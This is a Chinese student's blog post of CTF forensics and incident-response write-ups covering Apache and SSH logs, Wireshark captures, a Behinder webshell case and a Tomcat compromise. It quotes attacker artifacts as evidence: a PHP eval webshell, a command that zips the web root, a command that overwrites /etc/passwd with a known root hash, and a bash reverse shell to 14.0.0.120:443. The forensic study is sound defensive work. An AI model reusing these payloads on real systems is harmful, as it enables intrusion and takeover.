DIDCTF-應急響應

前言

最近在學長分享應急響應與電子取證的知識,又恰逢期末周沒有課,記錄自己在取證道路的成長。

linux-basic-command

下載附件,得到Apache 服務器訪問日志文件,根據題目要求找出排名前五的ip,題目提示寫腳本,腳本如下

from collections import Counterdef extract_ips_from_log(log_file_path):ip_list = []with open(log_file_path, 'r', encoding='utf-8') as file:for line in file:# 提取 IP 地址(Apache日志默認第一個字段是IP)parts = line.split()if not parts:continueip = parts[0]# 檢查時間戳是否在2015年(格式如 [12/Dec/2015:18:25:11 +0100])if "2015" in line:ip_list.append(ip)return ip_listdef get_top_ips(ip_list, top_n=5):ip_counter = Counter(ip_list)top_ips = ip_counter.most_common(top_n)return [ip for ip, count in top_ips]def main():log_file_path = r"D:\取證\access.log"  # 使用原始字符串(raw string)避免轉義問題ip_list = extract_ips_from_log(log_file_path)top_ips = get_top_ips(ip_list)# 輸出結果,用逗號分隔print(",".join(top_ips))if __name__ == "__main__":main()

注意修改文件路徑即可。

flag{148.251.50.49,213.150.254.81,37.1.206.196,178.191.155.244,195.212.98.190}.

ire7-windows-log

下載得到日志文件,先點開看到信息,應該是跟登錄有關,看了看信息發現登錄失敗,并且有關鍵字“審核失敗”,那我們直接搜"審核成功"發現key

key{5sBgaXqR}

wireshark0

根據題目提示找到key1,直接搜索字符串“key1”在tcp流88找到答案?HYDw29eP

?wireshark0.5

題目描述為用戶登入,其實可以先搜包含login的數據包,?http contains "login",

?大眼一看這么多get請求中夾著post,直接去看post請求的包,果然發現了密碼

flag{0p-0p-0p-}?

linux-log

依據分析日志,我是先看到最后一條日志,

Nov 20 12:05:26 student sshd[2052]: Accepted password for root from 192.168.4.223 port 54847 ssh2
Nov 20 12:05:26 student sshd[2052]: pam_unix(sshd:session): session opened for user root by (uid=0)

這應該是登錄成功了,提交時間flag{120526},發現不對,然后我就搜索了"Accepted",然后看到第一出現的日志

Nov 19 17:28:47 student sshd[5215]: Accepted password for root from 192.168.4.23 port 60563 ssh2

Nov 19 17:28:47 student sshd[5214]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.4.23 ?user=root

Nov 19 17:28:47 student sshd[5215]: pam_unix(sshd:session): session opened for user root by (uid=0)

提交答案 flag{172847}正確

wireshark1

依舊老樣子,先搜關鍵字key,發現www0587.zip,非常可疑,然后看看跟這個壓縮包有關的數包,http contains "www0587.zip",果然就兩個數據包,一個get請求,一個post請求,先看post請求,

?執行了一條命令

act=shell&cwd=%2Fvar%2Fwww%2Fhtml%2F&p1=+zip+-P+Adm1n%21+www0587.zip+-r+%2Fvar%2Fwww%2Fhtml&p2=&p3=&p4=&charset=gbk

  • 使用?zip?命令打包網站目錄 (/var/www/html)

  • 設置壓縮包密碼為?Adm1n!(常見弱密碼)

  • 生成名為?www0587.zip?的壓縮文件(可能用于后續下載)

然后是get請求,打開看到亂碼,猜測key應該在壓縮包里。然后就想辦法導出壓縮包。在wireshark中能夠將流量包中zip文件導出,具體步驟

捕獲或打開包含文件傳輸的流量包?(如HTTP、FTP、SMB等協議)點擊菜單欄的?"文件(File)" > "導出對象(Export Objects)"根據傳輸協議選擇相應選項(如HTTP、SMB等)在彈出的窗口中,Wireshark會列出所有可導出的對象查找并選擇您需要的壓縮包文件(可通過文件類型或大小識別)點擊"保存(Save)"或"保存所有(Save All)"按鈕選擇保存位置并確認。

使用其他方法可能會得到數據損壞的文件,導出后也知道了密碼,就解壓找key就行了

在Th1sLSth3key文件里

key:4tEm21x5

welog1

依舊是熟悉的日志文件,我一般都是直接看最后一個,發現狀態碼200,直接讓ai分析一下日志,

使用into outfile將惡意代碼寫入服務器,

惡意代碼就是<?php @eval($_POST['3b90d75de248ce55b66e8e30873b6000']);?>,一句話木馬,那密碼就是3b90d75de248ce55b66e8e30873b6000

flag{3b90d75de248ce55b66e8e30873b6000}

wireshark2.1

根據題目提示找key4的值,直接搜字符串key4,

發現key4.txt,根據上面寫的方法導出文件,題目有給出了壓縮包密碼,得到flag

C8iuACXB

data-recovery

題目要求恢復磁盤文件,需要用工具DiskGenius,具體操作流程如下(下面這幾張圖是偷學長的,他不知道,,,)

?然后把壓縮包解壓flag就在里面了。

flag{73D3DA963F7505E9}

wireshark2?

題目給了兩個流量包,通過某種特殊協議傳輸的敏感數據key1的值。老樣子直接搜字符串key1,在第一個數據包沒搜到,再第二個數據包發現可疑數據

?讓ai分析后發現這段十六進制數據轉換為ASCII文本后,顯示的是一個Linux/Unix系統中的目錄列表。執行了ls命令,然后繼續往下看,ls命令執行后又執行了 cat key.txt,內容為

welcome_to_cisp-ire_and_the_key1_is_6r56FeX8

答案就是6r56FeX8

所以第一個流量包有啥用??

wireshark3

給個流量包,根據上面幾題來看,我直接搜key關鍵字,果然有發現

key:wHa1_a_bUsY_dAy!!

我以為是答案發現不對, 然后看協議分組統計發現有4個POST請求,

發現了壓縮包,老樣子導出壓縮包,上面說的方法不行,然后又去看了其大佬的博客,?方法如下

在流量包中點Media Type

然后右鍵,選導出分組字節流,保存為zip文件,解壓發現需要密碼,就是上面的key,解壓得到ZmxhZ3syNTQ2YTZkODBjNGRiNDg2MzVlYjZ9,一眼base64,解碼得到flag

flag{2546a6d80c4db48635eb6}

2024長城杯決賽-溯源取證

背景材料

您的同事李白在運維一臺部署了移動應用服務端的linux服務器時發現了異常,好像被黑客攻擊了。小李通過簡單分析,發現可能是由于公司的移動應用和其服務端程序都存在安全問題導致的。小李將當天可能與攻擊相關的流量導出,并與移動應用一起打包壓縮,你可以下載分析,也可以登錄此服務器進行攻擊溯源、排查等,提供了SSH和VNC訪問的方式供您和您的團隊進行分析取證。

條件限制,沒有靶機,但是用流量包也可以做

關卡1

要找出黑客攻擊的兩個ip,在wireshark中,統計->端點可以列出所有ip

?當時以為前兩個就是,提交發現不對,所以只能一個一個分析。

先看ip為202.1.1.1的流量包 ip.src==202.1.1.1,

區分一下ip.addr和ip.src

條件定義包含的 IP 地址
ip.addr匹配數據包中任何與 IP 相關的地址,包括源 IP 和目的 IP。同時涵蓋 ?ip.src? 和 ?ip.dst?。
ip.src僅匹配數據包的源 IP 地址,即發送該數據包的設備 IP。僅指向數據包的發送方 IP。

?ip.addr == X? 等價于 ip.src == X || ip.dst == X?(||? 表示 “或” 關系)。

?而我們要找攻擊者ip,所以用ip.src==202.1.1.1,服務器與客戶端交互,服務器中也會有攻擊數據,

看到好多post請求,而且執行了命令,這個就是黑客ip,而202.1.1.66就是受害者,

然后看202.1.129和202.1.1.130 ,看202.1.129發現執行了命令

所以202.1.1.129也是黑客ip

綜上 202.1.1.1 202.1..1.129

關卡2

?要找登錄密碼,直接 http contains "login",然后一個一個看,在第二個包中發現flag

?{"flag":"password663399"}

關卡3

跟題目提示,找我無上上傳權限的文件,直接搜 http contains "無上傳權限",

文件名?pic.jpg

關卡4?

找api地址,就是上面那個圖。答案就是??http://202.1.1.66:8080/api/upload

關卡5

要找上傳路徑,肯定是上傳成功了,http.response.code==200,在tcp流51號找到了上傳路徑,http://202.1.1.66:8080/static/s74e7vwmzs21d5x6.jsp 但是沒有靶機,答案是/usr/local/tomcat/webapps/ROOT/static/s74e7vwmzs21d5x6.jsp

關卡6

這一關要找密鑰,那就要看看那個木馬了,讓ai分析一下得到傳入bing_pass生成密鑰,提交后正確 答案是bing_pass

關卡7

既然文件都上傳進去了,那我們要找相關數據包? http.request.method == "POST" && http.request.uri contains "s74e7vwmzs21d5x6.jsp",先看第一個包,給出了密鑰,第二個是正確的b99f657b04941030,然后就是冰蝎流量分析,冰蝎一般連接服務端之后會默認發一個狀態檢測包,因此第一個包一

般不用看。看第二個包即可

有密鑰有密文解密就行,

這是class文件,反編譯得到源碼,我用的是jadx反編譯,得到答案 pwd

關卡8

繼續看下一個流量包,按照上面的步驟,這次執行了whoami

?看響應體即可,這里把數據保存為原始數據,然后在AES解密,(圖示網站AES在線解密 AES在線加密 Aes online hex 十六進制密鑰 - The X 在線工具)

base64解密 得到 tomcat這就是答案

關卡9

還是繼續往下看 ,在tcp流174 中執行了4條命令,'cat /etc'? 'ls'? 'ls /etc'? ?'cat /etc/redhat-release'。而最后一條命令就是用于查看?Red Hat Enterprise Linux (RHEL)?或其衍生發行版(如 CentOS、Fedora)的系統版本信息。同上方法解密響應體得到答案?

CentOS Linux release 7.4.1708 (Core) 

關卡10

在看流量包是看到

GET /static/secert.file HTTP/1.1

這個路徑和第5題有點像,在同一目錄下/usr/local/tomcat/webapps/ROOT/static/secert.file

關卡11

http.request.method == "POST" && http.request.uri contains "s74e7vwmzs21d5x6.jsp",

繼續向下看后黑客又執行了幾條命令,在tcp流283中,

?響應體顯示succcess,連接成功,看tcp 284就行

?執行了命令cat /etc/passwd

關卡12

在執行了cat /etc/passwd,黑客又執行了

echo -e "root:\$6\$KHysqjWMnoaHJ4QW\$p1cMTekiYb/6xA2u7j4jAD3m5shTPlPAtM6jyoex73MxxHXlms4X0874ml/gw6.LETsMs5oXLWyGeSAddx2N..:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\navahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\npolkitd:x:999:998:User for polkitd:/:/sbin/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologin\ngeoclue:x:998:996:User for geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\ncolord:x:997:995:User for colord:/var/lib/colord:/sbin/nologin\npulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin\ngdm:x:42:42::/var/lib/gdm:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\ntomcat:x:1000:1000::/home/tomcat:/bin/bash\n" > /etc/passwd

這條命令替換了root用戶的密碼哈希值,所以通過/etc/passwd文件修改密碼

關卡13

已知密文是$6$KHysqjWMnoaHJ4QW$p1cMTekiYb/6xA2u7j4jAD3m5shTPlPAtM6jyoex73MxxHXlms4X0874ml/gw6.LETsMs5oXLWyGeSAddx2N..

解密就行了,看大佬都是用hashcat但是我復現光出錯,我再去沉淀沉淀。。。

密碼是123456(別問我怎么知道的)

關卡14

上面得到ip和端口

202.1.1.129:4444,但是不對,搜索該ip后發現不但有4444端口,還有9999端口

?答案是202.1.1.129:9999

關卡15

反連的ip和端口我們已經知道了,直接找 tcp.port==9999,在tcp流536中找到答案

rpm -qa | grep pam

rpm -qa | grep pam?是 Linux 系統中用于查詢已安裝的?PAM (Pluggable Authentication Modules)?相關軟件包的命令。下面我將詳細解釋這個命令的作用和典型輸出

關卡16

?這一看正好題目給了這倆文件,已提交果然對了

pam_unix.so

關卡17

這就要用到題目給的那兩個文件了,這個文件可以用IDA打開,我學的web這IDA也不會用,只好求助我學逆向的同學,然后找到了,這個字符串比較,如果不相等就退出

?ssh_back_pwd就是密碼

關卡18

如上圖,文件就是/tmp/.sshlog

流量特征分析-常見攻擊事件 tomcat - From 玄機

tomcat-1

讓分析可疑ip,先統計分析一下

?看最多的那兩個先看14.0.0.120

ip.src==14.0.0.120;

看到許多SYN包,猜測是SYN Flood 攻擊

流量特征:
發送大量 SYN 包,嘗試建立連接但不完成三次握手過程(半開連接)。
TCP SYN 包的來源端口和目標端口多為隨機,常見目標端口為 21(FTP)、22(SSH)、80(HTTP)、443(HTTPS)等常見服務端口。
如果目標主機回復 SYN-ACK 包,Nmap 會立即發送 RST 包來中斷連接。
nmap默認掃描就是SYN掃描,數據包中User-Agent都是帶有特征的

那這個就是攻擊者ip

flag{14.0.0.120}

tomcat-2

然分析地址,在線網站查詢一下就行ip查詢 查ip 網站ip查詢 同ip網站查詢 iP反查域名 iP查域名 同ip域名

flag{guangzhou}

tomcat-3

1. 常見的 Web 管理端口

通常,Web 服務器管理面板會使用以下常見端口:

80(HTTP):不安全的網頁訪問。
443(HTTPS):安全的網頁訪問。
8080:常見的備用 HTTP 端口。
8443:常見的備用 HTTPS 端口。
2082, 2083:cPanel 默認管理端口。
10000:Webmin 默認管理端口。
8006:Proxmox Virtual Environment 管理端口。
3000:用于許多自定義和開發中的管理面板,如 Grafana。
同樣的我們也可以通過一下特征來識別管理面板;

根據流量內容,可以識別是否是管理面板的訪問請求。通常,管理面板的 URL 路徑可能包含如下關鍵詞:admin
login
cpanel
webmin
dashboard
manage
搜索'admin'發現就是8080端口,

flag{8080}

tomcat-4

上文說到黑客應該是用NMAP掃描目錄了這時候就可以看一下User-Agent,帶有特征的

要看原地址是黑客ip的流量包

flag{gobuster}

tomcat-5?

第一想法是直接搜login http.contains "login",沒有找到答案,然后找了一圈啥也沒找到,最后分析協議是發現只有一個POST請求,看一下,發現Authorization

HTTP基本認證是一種常見的用戶認證方法。它的工作原理是通過HTTP頭部的 Authorization 字段來傳遞用戶的憑證(用戶名和密碼)。Authorization 字段緊跟著一個 Basic 關鍵字,后面跟著一串Base64編碼的字符串。

解碼得到flag

flag{admin-tomcat}

tomcat-6?

還是那個流量包,有個文件JXQOZY.war,

flag{JXQOZY.war}

tomcat-7

這個是真不會,無從下手,然后看大佬博客

在流量中,任何涉及到管理接口、上傳文件、或執行命令的請求都需要重點關注。例如:

POST /manager/html/upload:上傳文件請求
/bin/sh 或 /bin/bash:執行命令的請求
提權后的持久化手段

攻擊者常用的方法包括:

上傳惡意文件:例如,WAR文件中可能包含shell腳本或其他惡意代碼。
定時任務(cron job):通過定時任務執行惡意代碼。
后門程序:例如,將惡意程序放置在 /bin 或其他系統目錄。

直接搜“/bin"得到答案

flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}?

結語

行文至此,大一下學期的取證就學到這,接下來要認真準備期末了。說來當時學長剛開始講取證的時候,也沒有太大的興趣,后來自己在刷雜項題的時候,看到了取證題腦袋一熱就想學,就以此篇文章為我學取證的開篇。剩下的題目等期末考試后再寫。

路漫漫其修遠兮,吾將上下而求索。(最后也祝愿大家期末考試門門都考90以上!!)

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/84127.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/84127.shtml
英文地址,請注明出處:http://en.pswp.cn/web/84127.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

MybatisPlus深入學習

今天深入的學習了一下mp&#xff0c;從頭開始學習&#xff01;哈哈哈哈哈 本節只講干的&#xff01; 我們上來先看一段代碼&#xff0c;不知道你能不能看明白&#xff01; package com.itheima.mp.mapper;import com.baomidou.mybatisplus.core.conditions.query.QueryWrapp…

安卓9.0系統修改定制化____安卓9.0系統精簡 了解系統app組件構成 系統app釋義 常識篇 一

在安卓 9.0 系統的使用過程中,許多用戶都希望能夠對系統進行深度定制,讓手機系統更加貼合個人需求。而系統精簡作為定制化的重要一環,不僅能夠釋放手機存儲空間,還能提升系統運行速度,優化資源分配。想要安全有效地對安卓 9.0 系統進行精簡,深入了解系統 app 組件的構成是…

2.4 Windows Conan編譯FFmpeg 4.4.1

Conan的安裝與使用參考之前的文章&#xff1a;Conan簡單使用 一、Conan編譯ffmpeg 1.1 Conan的配置文件 創建配置文件&#xff1a;C:\Users\wujh\.conan2\profiles\vs2019 [settings] archx86_64 build_typeRelease compilermsvc compiler.cppstd14 compiler.runtimedynami…

社群經濟視域下開源鏈動2+1模式與AI智能名片賦能S2B2C商城小程序的創新發展研究

摘要&#xff1a;在數字經濟蓬勃發展的背景下&#xff0c;社群經濟作為連接用戶情感與價值反哺的新型經濟形態&#xff0c;正通過技術創新與模式重構實現深度演化。本文基于社群經濟“創造有價值連接”的本質特征&#xff0c;系統探討“開源鏈動21模式”“AI智能名片”與“S2B2…

【計算機網絡】——reactor模式高并發網絡服務器設計

&#x1f525;個人主頁&#x1f525;&#xff1a;孤寂大仙V &#x1f308;收錄專欄&#x1f308;&#xff1a;計算機網絡 &#x1f339;往期回顧&#x1f339;&#xff1a;【計算機網絡】非阻塞IO——epoll 編程與ET模式詳解——(easy)高并發網絡服務器設計 &#x1f516;流水不…

Uniapp跨端兼容性全方位解決方案

在當今多端融合的移動互聯網時代&#xff0c;Uniapp作為一款優秀的跨平臺開發框架&#xff0c;已成為許多開發者的首選。然而&#xff0c;真正的挑戰在于如何優雅地處理不同平臺之間的差異。本文將全面剖析Uniapp跨端開發的兼容性處理方案&#xff0c;提供從基礎到高級的完整解…

迅為RK3576開發板NPUrknn-toolkit2環境搭建和使用docker環境安裝

開發板采用核心板底板結構&#xff0c;在我們的資料里提供了底板的原理圖工程以及PCB工程&#xff0c;可以實現真正意義上的裁剪、定制屬于自己的產品&#xff0c;滿足更多應用場合。 迅為針對RK3576開發板整理出了相應的開發流程以及開發中需要用到的資料&#xff0c;并進行詳…

什么是 OpenFeigin ?微服務中的具體使用方式

什么是Feign&#xff1f; Feign 是一種聲明式的 HTTP 客戶端框架&#xff0c;主要用于簡化微服務架構中服務之間的遠程調用&#xff0c;也可以通過定義接口和注解的方式調用遠程服務&#xff0c;無需手動構建 HTTP 請求或解析響應數據。Spring Cloud 對 Feign 進行了增強&…

對抗性提示:進階守護大語言模型

人工智能模型正快速進化 —— 變得更具幫助性、更流暢&#xff0c;并且更深入地融入我們的日常生活和商業運營中。但隨著其能力的提升&#xff0c;風險也在增加。在維護安全可信的人工智能方面&#xff0c;最緊迫的挑戰之一是對抗性提示&#xff1a;這是一種微妙且通常富有創意…

運營商頻段

以下是三大運營商&#xff08;中國移動、中國電信、中國聯通&#xff09;及中國廣電的 5G 主要頻段 及其所屬運營商的整理表格&#xff1a; 運營商頻段上行頻率 (MHz)下行頻率 (MHz)帶寬備注廣電n28703-733758-788230MHz移動共享n794900-4960-60MHz-移動n412515-2675-160MHz-n7…

項目拓展-Apache對象池,對象池思想結合ThreadLocal復用日志對象

優化日志對象創建以及日志對象復用 日志對象上下文實體類 traceId 請求到達時間戳 請求完成時間戳 請求總共耗費時長 get/post/put/delete請求方式 Http狀態碼 原始請求頭中的所有鍵值對 請求體內容 響應體內容 失敗Exception信息詳細記錄 是否命中緩存 package c…

Javaweb - Vue入門

Vue是一款用于構建用戶界面的漸進式的JavaScript框架。 使用步驟 引入Vue模塊&#xff0c;創建Vue的應用實例&#xff0c;定義元素&#xff0c;交給Vue控制。 一、引入Vue模塊 因為使用的是模塊化的JavaScript&#xff0c;因此在script標簽內要聲明一個屬性&#xff1a;typ…

C++ 標準模板庫各個容器的應用場景分析

C 標準模板庫&#xff08;STL&#xff09;中的容器分為序列式容器、關聯式容器和無序容器&#xff0c;各自適用于不同場景。以下是主要容器的應用場景及案例&#xff1a; 一、序列式容器 元素按插入順序存儲&#xff0c;支持線性訪問。 1. vector 場景&#xff1a;動態數組…

安裝前端vite框架,后端安裝fastapi框架

前期準備 首先新建一個文件夾&#xff0c;文件夾里面新建一個文件夾&#xff0c;用于安裝依賴 安裝vite框架 npm init -y 目的是安裝package.json配置文件 npm install vite --save-dev 安裝vite框架 安裝完是這個樣子 新建了一個文件夾和js文件 后端內容 main.js document.…

深度學習:基礎與概念(第1章:深度學習革命)

目錄 第1章&#xff1a;深度學習革命 1.1深度學習的影響 1.1.1醫療診斷 1.1.2蛋白質結構預測 1.1.3圖像合成 1.1.4大語言模型 1.2一個教學示例 1.2.1合成數據 1.2.2線性模型 1.2.3誤差函數 1.2.4模型復雜度 1.2.5正則化 1.2.6模型選擇 1.3機器學習簡史 1.3.1單層…

通過觸發器統計訪問數據庫的客戶端IP地址

通過觸發器統計訪問數據庫的客戶端IP地址 創建用戶登錄審計表創建登錄審計觸發器查看登錄審計結果禁用和啟用觸發器創建用戶登錄審計表 創建記錄表: create table appuser1.user_login_audit (login_time DATE,session_id number,username VARCHAR2(30),os_user VARCHAR2(30…

在MCU上的1微秒的延遲實現方案及測量方法

運行環境&#xff1a; stm32h743iit6; 主頻480MHz; APB1; 240MHz; TIM5 240MHz; 預分頻系數為1; 定時器計數頻率240MHz&#xff1b; 應用需求&#xff1a;實現軟件模擬IIC&#xff0c;延遲精度2個微秒&#xff1b; 量變引起質變&#xff0c;當延遲粒度太小時&#xff0c;需要考…

macos電腦本地搭建mistral-7b大模型出現4-bit量化和緩存不足問題的記錄

問題背景 本人想再本地筆記本電腦上搭建一個mistral-7b的大模型&#xff0c;在搭建的過程中&#xff0c;出現了4-bit量化模式無法處理的問題&#xff0c;以及電腦內存/顯存不足的問題&#xff0c;導致無法搭建 電腦硬件信息 名稱&#xff1a;2019 Mac book pro 內存&#xff1a…

C# 基礎知識總結(帶詳細文字說明)

1. 基礎語法結構 C# 程序由命名空間、類和方法組成。每個程序必須有一個 Main 方法作為入口點。using 指令用于導入命名空間&#xff0c;Console.WriteLine() 是常用的輸出方法。 csharp 復制 下載 using System; // 引入核心命名空間class Program // 類定義 {static v…

C#最佳實踐:為何要統一命名

C#最佳實踐:為何要統一命名 在 C# 編程的世界里,代碼就像是一座龐大的數字城市,而命名則是城市中縱橫交錯的街道名稱與建筑標識。如果沒有統一的命名規范,這座城市將陷入混亂,開發者在其中探索、維護代碼時也會迷失方向。統一命名不僅是一種編程習慣,更是保障代碼質量、…